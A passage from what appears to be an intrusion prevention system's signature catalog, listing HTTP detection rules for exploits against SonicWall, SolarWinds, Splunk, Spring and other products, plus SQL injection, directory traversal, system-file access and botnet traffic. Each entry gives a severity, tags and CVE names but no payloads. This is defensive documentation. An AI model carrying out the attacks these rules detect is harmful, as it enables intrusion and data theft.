Tags: Windows, Any Hardware, Windows not specific, Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-618-5211
Last changed: sgpkg-ips-618-5211
Vulnerability: Skywiper-B-Trojan
Description:
Back to top

HTTP_CSU-Smart-Software-Solutions-Codesys-ENI-Server-Stack-Buffer-Overflow

About this situation: An attempt to exploit a stack buffer overflow detected
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, Smart Software Solutions CoDeSys, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-607-5211
Last changed: sgpkg-ips-607-5211
Vulnerability: Smart-Software-Solutions-Codesys-ENI-Server-Stack-Buffer-Overflow
Description:
Back to top

HTTP_CSU-Smart-Software-Solutions-Codesys-Webserver-Stack-Buffer-Overflow

About this situation: An attempt to exploit a stack buffer overflow detected
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, Smart Software Solutions CoDeSys, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-608-5211
Last changed: sgpkg-ips-608-5211
Vulnerability: Smart-Software-Solutions-Codesys-Webserver-Stack-Buffer-Overflow
Description:
Back to top

HTTP_CSU-Snap-Creek-Duplicator-Wordpress-Plugin-Code-Injection

About this situation: An attempt to exploit a vulnerability in Snap Creek Duplicator detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Snap Creek Duplicator, CVE2018, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1151-5242
Last changed: sgpkg-ips-1153-5242
Vulnerability: Snap-Creek-Duplicator-Wordpress-Plugin-Code-Injection
Description:
Back to top

HTTP_CSU-SocGholish-Framework-HTTP-Request

About this situation: A SocGholish HTTP request was detected
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1536-5242
Last changed: sgpkg-ips-1536-5242
Vulnerability: SocGholish-Framework-Activity
Description:
Back to top

HTTP_CSU-Solarwinds-Firewall-Security-Manager-Userlogin.jsp-Policy-Bypass

About this situation: An attempt to exploit a vulnerability in SolarWinds Firewall Security Manager detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, SolarWinds Firewall Security Manager, CVE2015, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-635-5211
Last changed: sgpkg-ips-635-5211
Vulnerability: Solarwinds-Firewall-Security-Manager-Userlogin.jsp-Policy-Bypass
Description:
Back to top

HTTP_CSU-Solarwinds-Orion-Patch-Manager-Chart-Insecure-Deserialization

About this situation: An attempt to exploit a vulnerability in SolarWinds Patch Manager detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, SolarWinds Patch Manager, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1404-5242
Last changed: sgpkg-ips-1404-5242
Vulnerability: Solarwinds-Orion-Patch-Manager-Chart-Insecure-Deserialization
Description:
Back to top

HTTP_CSU-Solarwinds-Orion-Platform-Authentication-Bypass

About this situation: An attempt to exploit a vulnerability in SolarWinds Orion Platform detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, SolarWinds Orion, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1313-5242
Last changed: sgpkg-ips-1313-5242
Vulnerability: Solarwinds-Orion-Platform-Authentication-Bypass
Description:
Back to top

HTTP_CSU-Solarwinds-Serv-U-Directory-Traversal-CVE-2024-28995

About this situation: An attempt to exploit a vulnerability in SolarWinds Serv-U FTP Server detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, SolarWinds Serv-U FTP Server, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1738-5242
Last changed: sgpkg-ips-1768-5242
Vulnerability: Solarwinds-Serv-U-Directory-Traversal-CVE-2024-28995
Description:
Back to top

HTTP_CSU-Solarwinds-Storage-Manager-Authenticationfilter-Authentication-Bypass

About this situation: An attempt to exploit a vulnerability in SolarWinds Storage Manager detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, SolarWinds Storage Manager, CVE2015, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-605-5211
Last changed: sgpkg-ips-1060-5242
Vulnerability: Solarwinds-Storage-Manager-Authenticationfilter-Authentication-Bypass
Solarwinds-Storage-Manager-Authenticationfilter-Policy-Bypass
Description:
Back to top

HTTP_CSU-Sonatype-Nexus-Repository-Manager-CVE-2021-37152-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in Sonatype Nexus Repository Manager detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Sonatype Nexus Repository Manager, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1400-5242
Last changed: sgpkg-ips-1405-5242
Vulnerability: Sonatype-Nexus-Repository-Manager-CVE-2021-37152-Cross-Site-Scripting
Description:
Back to top

HTTP_CSU-SonicWall-Email-Security-Path-Traversal-CVE-2021-20023

About this situation: An attempt to exploit a vulnerability in SonicWall Email Security detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, SonicWall Email Security, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1405-5242
Last changed: sgpkg-ips-1405-5242
Vulnerability: SonicWall-Email-Security-Path-Traversal-CVE-2021-20023
Description:
Back to top

HTTP_CSU-SonicWall-Gms-And-Analytics-Detectinjection-Potential-SQL-Injection

About this situation: An attempt to exploit a vulnerability in SonicWall Analytics detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, SonicWall GMS, SonicWall Analytics, CVE2023, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1625-5242
Last changed: sgpkg-ips-1635-5242
Vulnerability: SonicWall-Gms-And-Analytics-Detectinjection-SQL-Injection
Description:
Back to top

HTTP_CSU-SonicWall-Gms-And-Analytics-Detectinjection-SQL-Injection

About this situation: An attempt to exploit a vulnerability in SonicWall Analytics detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, SonicWall GMS, SonicWall Analytics, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1625-5242
Last changed: sgpkg-ips-1625-5242
Vulnerability: SonicWall-Gms-And-Analytics-Detectinjection-SQL-Injection
Description:
Back to top

HTTP_CSU-SonicWall-Gms-And-Analytics-Searchfilter-Command-Injection

About this situation: An attempt to exploit a vulnerability in SonicWall Analytics detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, SonicWall GMS, SonicWall Analytics, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1621-5242
Last changed: sgpkg-ips-1621-5242
Vulnerability: SonicWall-Gms-And-Analytics-Searchfilter-Command-Injection
Description:
Back to top

HTTP_CSU-SonicWall-Remote-Code-Execution-CVE-2021-20038

About this situation: An attempt to exploit a vulnerability in SonicWall detected
Context: HTTP Request URI
Severity: 10
Tags: Any Operating System, Any Hardware, SonicWall, CVE2021, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1429-5242
Last changed: sgpkg-ips-1621-5242
Vulnerability: SonicWall-Remote-Code-Execution-CVE-2021-20038
Description:
Back to top

HTTP_CSU-SonicWall-Secure-Mobile-Access-Arbitrary-File-Deletion

About this situation: An attempt to exploit a vulnerability in SonicWall Mobile Access detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, SonicWall Mobile Access, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1396-5242
Last changed: sgpkg-ips-1396-5242
Vulnerability: SonicWall-Secure-Mobile-Access-Arbitrary-File-Deletion
Description:
Back to top

HTTP_CSU-SonicWall-SSLVPN-Session-Hijacking-CVE-2024-53704

About this situation: An attempt to exploit a vulnerability in SonicWall SSLVPN detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, SonicWall SSL-VPN, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1838-5242
Last changed: sgpkg-ips-1839-5242
Vulnerability: SonicWall-SSLVPN-Session-Hijacking-CVE-2024-53704
Description:
Back to top

HTTP_CSU-SPIP-RSS-Php-Globals-Type-URLs-Code-Injection

About this situation: Detects code execution exploits against SPIP's Spip_rss.php
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, SPIP, CVE2006, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-60-1210
Last changed: sgpkg-ips-148-2032
Vulnerability: HTTP-SPIP-RSS-Php-Globals-Type-URLs-Code-Injection
Description:
Back to top

HTTP_CSU-Splunk-Collect-File-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Splunk Splunk detected
Context: HTTP Request URI
Severity: 10
Tags: Any Operating System, Any Hardware, Splunk, CVE2013, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-578-5211
Last changed: sgpkg-ips-666-5211
Vulnerability: Splunk-Collect-File-Directory-Traversal
Description:
Back to top

HTTP_CSU-Splunk-Enterprise-Splunk-App-For-Lookup-File-Editing-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Splunk App for Lookup File Editing detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Splunk, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1604-5242
Last changed: sgpkg-ips-1604-5242
Vulnerability: Splunk-Enterprise-Splunk-App-For-Lookup-File-Editing-Directory-Traversal
Description:
Back to top

HTTP_CSU-Spring-Cloud-Config-Server-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Spring Cloud Config detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Spring Cloud Config, CVE2019, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1194-5242
Last changed: sgpkg-ips-1344-5242
Vulnerability: Spring-Cloud-Config-Server-Directory-Traversal
Description:
Back to top

HTTP_CSU-Spring-Security-RegexRequestMatcher-Authorization-Bypass-CVE-2022-22978

About this situation: An attempt to exploit a vulnerability in Spring Security detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Spring Security, CVE2022, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1837-5242
Last changed: sgpkg-ips-1838-5242
Vulnerability: Spring-Security-RegexRequestMatcher-Authorization-Bypass-CVE-2022-22978
Description:
Back to top

HTTP_CSU-Spyeye-Traffic

About this situation: SpyEye traffic detected
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-619-5211
Last changed: sgpkg-ips-619-5211
Vulnerability: Spyeye-Botnet
Description:
Back to top

HTTP_CSU-Spyware-Webhancer

About this situation: Spyware WebHancer traffic detected
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, WebHancer, Windows not specific, Spyware, Malware and Adware, TCP Client Traffic
First detected in: sgpkg-ips-616-5211
Last changed: sgpkg-ips-616-5211
Vulnerability: Spyware-Webhancer
Description:
Back to top

HTTP_CSU-SQL-Declare-Cast

About this situation: SQL commands detected in URI
Context: HTTP Request URI
Severity: 10
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-155-2032
Last changed: sgpkg-ips-161-2032
Vulnerability: SQL-Injection
Description:
Back to top

HTTP_CSU-SQL-Expression-Always-True

About this situation: SQL commands detected in URI
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-155-2032
Last changed: sgpkg-ips-419-4219
Vulnerability: SQL-Injection
Description:
Back to top

HTTP_CSU-SQL-Injection-End-Of-Line-Comments

About this situation: An SQL injection detected
Context: HTTP Request URI
Severity: 10
Tags: Any Operating System, Any Hardware, CVE2013, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-554-5211
Last changed: sgpkg-ips-1010-5242
Vulnerability: SQL-Injection
Sqlmap-SQL-Injection-Tool
Red-Hat-CloudForms-Management-Engine-SQL-Injection
Description:
Back to top

HTTP_CSU-SQL-Select-Password

About this situation: SQL commands detected in URI
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-145-2032
Last changed: sgpkg-ips-148-2032
Vulnerability: SQL-Injection
Description:
Back to top

HTTP_CSU-SQL-Syntax-In-URI-Parameters

About this situation: SQL command structure in URI parameters detected
Context: HTTP Request URI
Severity: 2
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Possibly Unwanted Content, TCP Client Traffic
First detected in: sgpkg-ips-618-5211
Last changed: sgpkg-ips-1010-5242
Description:
Back to top

HTTP_CSU-SQL-Union-Select

About this situation: SQL commands detected in URI
Context: HTTP Request URI
Severity: 10
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-145-2032
Last changed: sgpkg-ips-1397-5242
Vulnerability: SQL-Injection
Description:
Back to top

HTTP_CSU-SQuery-Php-Remote-File-Inclusion

About this situation: Detected an attempt to exploit a vulnerability in SQuery
Context: HTTP Request URI
Severity: 10
Tags: Any Operating System, Any Hardware, SQuery, CVE2006, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-155-2032
Last changed: sgpkg-ips-192-2032
Vulnerability: SQuery-Php-Remote-File-Inclusion
Description:
Back to top

HTTP_CSU-Srizbi-Activity

About this situation: Srizbi activity detected
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, Srizbi spambot, Windows not specific, Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-618-5211
Last changed: sgpkg-ips-618-5211
Vulnerability: Srizbi-Spambot
Description:
Back to top

HTTP_CSU-Srng

About this situation: SRNG traffic detected
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Spyware, Malware and Adware, TCP Client Traffic
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-615-5211
Vulnerability: Srng
Description:
Back to top

HTTP_CSU-Starware-Toolbar-Update

About this situation: Starware toolbar update request
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, Starware, Windows not specific, Spyware, Malware and Adware, TCP Client Traffic
First detected in: sgpkg-ips-224-3038
Last changed: sgpkg-ips-224-3038
Vulnerability: HTTP_Starware
Description:
Back to top

HTTP_CSU-Subgraph-Vega-Vulnerability-Scanner-Usage

About this situation: URI-parameters associated with Vega Vulnerability scanner have been detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Subgraph Vega, Any Operating System not specific, Suspected Probe, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-562-5211
Last changed: sgpkg-ips-562-5211
Vulnerability: Subgraph-Vega-Vulnerability-Scanner-Usage
Description:
Back to top

HTTP_CSU-SugarCRM-Multiple-Parameters-Directory-Traversal

About this situation: Access to vulnerable script in SugarCRM
Context: HTTP Request URI
Severity: 2
Tags: Any Operating System, Any Hardware, SugarCRM Sugar Sales, CVE2004, Any Operating System not specific, Potential Disclosure, TCP Client Traffic
First detected in: sgpkg-ips-19-1210
Last changed: sgpkg-ips-186-2032
Vulnerability: SugarCRM-Multiple-Parameters-Directory-Traversal
Description:
Back to top

HTTP_CSU-SugarCRM-Record-Parameter-SQL-Injection

About this situation: Attempt to exploit a SQL injection vulnerability in SugarCRM
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, SugarCRM Sugar Sales, CVE2004, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-19-1210
Last changed: sgpkg-ips-148-2032
Vulnerability: SugarCRM-Record-Parameter-SQL-Injection
Description:
Back to top

HTTP_CSU-Sun-One-Iplanet-Search-Component-File-Disclosure

About this situation: Attempt to access a vulnerable web application
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, iPlanet, Sun ONE Web Server, CVE2002, Any Operating System not specific, Disclosure, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-17-1210
Last changed: sgpkg-ips-186-2032
Vulnerability: Sun-One-Iplanet-Search-Component-File-Disclosure
Description:
Back to top

HTTP_CSU-Sundown-Malware-Activity

About this situation: Sundown activity detected
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-831-5242
Last changed: sgpkg-ips-1714-5242
Vulnerability: Sundown-Malware
Description:
Back to top

HTTP_CSU-SuperGuestBook-Configuration-File-Access

About this situation: An attempt to retrieve the configuration file of SuperGuestBook detected
Context: HTTP Request URI
Severity: 2
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Potential Disclosure, TCP Client Traffic
First detected in: sgpkg-ips-684-5211
Last changed: sgpkg-ips-925-5242
Description:
Back to top

HTTP_CSU-Supra-Smart-Cloud-TV-Remote-File-Inclusion

About this situation: An attempt to exploit a vulnerability in Supra Smart Cloud TV detected
Context: HTTP Request URI
Severity: 2
Tags: Any Operating System, Any Hardware, Supra Smart Cloud TV, CVE2019, Any Operating System not specific, Possibly Unwanted Content, TCP Client Traffic
First detected in: sgpkg-ips-1194-5242
Last changed: sgpkg-ips-1194-5242
Vulnerability: Supra-Smart-Cloud-TV-Remote-File-Inclusion
Description:
Back to top

HTTP_CSU-SUSE-Apache-Cgi-Source-Disclosure

About this situation: Access to cgi-bin-sdb alias directory
Context: HTTP Request URI
Severity: 2
Tags: SUSE Linux 6, Any Hardware, Apache, CVE2000, Apache not specific, Potential Disclosure, TCP Client Traffic
First detected in: sgpkg-ips-2-1102
Last changed: sgpkg-ips-186-2032
Vulnerability: HTTP-SUSE-Apache-Cgi-Source-Disclosure
Description:
Back to top

HTTP_CSU-Suspected-APT-Traffic-Pattern

About this situation: An HTTP request resembling APT traffic detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1007-5242
Last changed: sgpkg-ips-1007-5242
Vulnerability: Known-APT-Traffic
Description:
Back to top

HTTP_CSU-Suspected-Dot-Dot-Slash-Directory-Traversal

About this situation: Detects various encoded ../ traversals
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Any Software, Any Operating System not specific, Any Software not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1769-5242
Last changed: sgpkg-ips-1769-5242
Vulnerability: Directory-Traversal
Description:
Back to top

HTTP_CSU-Suspected-System-File-Disclosure

About this situation: Detects attempts to access system files
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Disclosure, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1639-5242
Last changed: sgpkg-ips-1783-5242
Vulnerability: HTTP_System-File-Access
ACTi-ASOC-2200-Web-Configurator-Remote-Root-Command-Execution
Description:
Back to top

HTTP_CSU-Suspicious-Dynamic-Link-Library-Download-Request

About this situation: An attempt to download a suspicious file detected
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, Safari, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-157-2032
Last changed: sgpkg-ips-1283-5242
Vulnerability: Apple-Safari-Desktop-File-Download
Description:
Back to top

HTTP_CSU-Suspicious-OGNL-Expression

About this situation: A suspicious OGNL expression was detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Apache Struts, Confluence, CVE2013, CVE2018, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-529-5211
Last changed: sgpkg-ips-1699-5242
Vulnerability: Apache-Struts-Wildcard-Matching-OGNL-Code-Execution
Apache-Struts-RCE-CVE-2018-11776
Confluence-OGNL-Injection-CVE-2022-26134
Description:
Back to top

HTTP_CSU-Suspicious-OGNL-Expression-2

About this situation: A suspicious OGNL expression was detected
Context: HTTP Request URI
Severity: 10
Tags: Any Operating System, Any Hardware, Apache Struts, Confluence, CVE2013, CVE2018, CVE2022, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1477-5242
Last changed: sgpkg-ips-1621-5242
Vulnerability: Apache-Struts-Wildcard-Matching-OGNL-Code-Execution
Apache-Struts-RCE-CVE-2018-11776
Confluence-OGNL-Injection-CVE-2022-26134
Description:
Back to top

HTTP_CSU-Suspicious-Request

About this situation: A suspicious request detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-567-5211
Last changed: sgpkg-ips-1831-5242
Vulnerability: Generic-HTTP-Exploit
Description:
Back to top

HTTP_CSU-Suspicious-URI-Pattern

About this situation: A suspicious pattern in URI detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-684-5211
Last changed: sgpkg-ips-1637-5242
Description:
Back to top

HTTP_CSU-Suspicious-Windows-Script-File-Retrieval-Via-WebDav

About this situation: A suspicious Windows script file retrieval detected
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, Any Software, Windows not specific, Any Software not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1832-5242
Last changed: sgpkg-ips-1833-5242
Vulnerability: Suspicious-Windows-Script-Retrieval-Via-WebDav
Description:
Back to top

HTTP_CSU-Suspiciously-Long-URI-Component

About this situation: Oversized URI Path Component
Context: HTTP Request URI
Severity: 2
Tags: Any Operating System, Any Hardware, Any Software, Any Operating System not specific, Any Software not specific, Possibly Unwanted Content, TCP Client Traffic
First detected in: sgpkg-ips-337-4219
Last changed: sgpkg-ips-520-5211
Description:
Back to top

HTTP_CSU-Suspiciously-Long-URI-Component-With-Potential-Shellcode

About this situation: Oversized URI Path Component with potentical shellcode detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Any Software, Any Operating System not specific, Any Software not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-340-4219
Last changed: sgpkg-ips-439-4219
Description:
Back to top

HTTP_CSU-Suspiciously-Long-URI-Path-Component

About this situation: An URI with a suspiciously long path component detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Any Software, Any Operating System not specific, Any Software not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-1831-5242
Description:
Back to top

HTTP_CSU-Sybase-EAServer-WebConsole-Buffer-Overflow

About this situation: Detects buffer overflow exploits against Sybase EAServer
Context: HTTP Request URI
Severity: 10
Tags: Any Operating System, Any Hardware, Sybase Enterprise Application Server, CVE2005, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-63-1210
Last changed: sgpkg-ips-1225-5242
Vulnerability: HTTP-Sybase-EAServer-WebConsole-Buffer-Overflow
Description:
Back to top

HTTP_CSU-Symantec-Endpoint-Protection-Manager-Authentication-Bypass

About this situation: An attempt to exploit a Symantec Endpoint Protection Manager vulnerability detected.
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Symantec Endpoint Protection Manager, CVE2015, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-768-5211
Last changed: sgpkg-ips-768-5211
Vulnerability: Symantec-Endpoint-Protection-Manager-Authentication-Bypass
Description:
Back to top

HTTP_CSU-Symantec-IM-Manager-Multiple-Cross-Site-Scripting

